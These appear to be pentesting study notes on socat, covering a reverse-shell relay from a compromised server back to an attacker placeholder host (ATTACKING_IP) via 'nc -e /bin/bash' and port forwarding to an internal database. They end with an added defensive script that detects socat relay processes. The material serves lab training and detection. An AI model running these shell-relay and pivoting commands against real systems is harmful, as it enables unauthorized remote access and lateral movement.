Definition

Socat is a tool often used to get a really stable Linux shell, but it is also good for port forwarding. It is not often installed by default, yet a lot of prebuilt binaries exist (cf. Gentil Kiwi).

Blog de Gentil Kiwi

Socat can also create encrypted connections for shells; see the room below for more info.

TryHackMe | Cyber Security Training

Socat can be used as a relay to listen for the reverse shell from the target and then forward it immediately back to the attacking box.


Reverse shell relay

Start a netcat listener with nc -lvnp 443 on the attacking machine, then start the relay on the compromised server.

./socat tcp-l:8000 tcp:ATTACKING_IP:443 & 

<aside> 💡 Note: the order of the two addresses matters here. Make sure to open the listening port first, then connect back to the attacking machine.

</aside>

We can now start a netcat reverse shell on port 8000 (with a static version of netcat).

nc 127.0.0.1 8000 -e /bin/bash

Port forwarding

The quick and easy way to set up a port forward with socat is quite simply to open up a listening port on the compromised server and redirect whatever comes into it to the target server.

./socat tcp-l:33060,fork,reuseaddr tcp:172.16.0.10:3306 &
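As an added defender-side example that is not part of the original notes, the shell function below flags socat processes whose arguments follow the listen-and-forward pattern used in both the relay and the port-forward commands above (a tcp-l: address followed by a tcp: address) and prints the listening port and forward destination for triage. It assumes ps-style command lines as input; the sample lines and the 10.50.0.5 address are constructed.

```shell
#!/bin/sh
# detect_socat_relay "<command line>": prints "port destination" and returns 0
# when the line is a socat listen-and-forward command, otherwise returns 1.
detect_socat_relay() {
    line="$1"
    case "$line" in
        *socat*) ;;
        *) return 1 ;;
    esac
    listen=""
    dest=""
    # Walk the arguments and pick out the listening and forwarding addresses.
    for arg in $line; do
        case "$arg" in
            tcp-l:*|tcp-listen:*|TCP-L:*|TCP-LISTEN:*)
                # drop the address type and any options such as ",fork,reuseaddr"
                listen=${arg#*:}
                listen=${listen%%,*}
                ;;
            tcp:*|tcp4:*|TCP:*|TCP4:*)
                dest=${arg#*:}
                dest=${dest%%,*}
                ;;
        esac
    done
    # Both halves must be present for this to be a relay / port forward.
    [ -n "$listen" ] && [ -n "$dest" ] || return 1
    printf '%s %s\n' "$listen" "$dest"
}

# scan_ps_output "<multi-line ps -eo args output>": one finding per line.
scan_ps_output() {
    printf '%s\n' "$1" | while IFS= read -r l; do
        detect_socat_relay "$l" || true
    done
}

# Constructed sample of `ps -eo args` output (10.50.0.5 is a made-up address).
SAMPLE_PS='/usr/sbin/sshd -D
./socat tcp-l:33060,fork,reuseaddr tcp:172.16.0.10:3306
./socat tcp-l:8000 tcp:10.50.0.5:443
bash -c sleep 60'

scan_ps_output "$SAMPLE_PS"
```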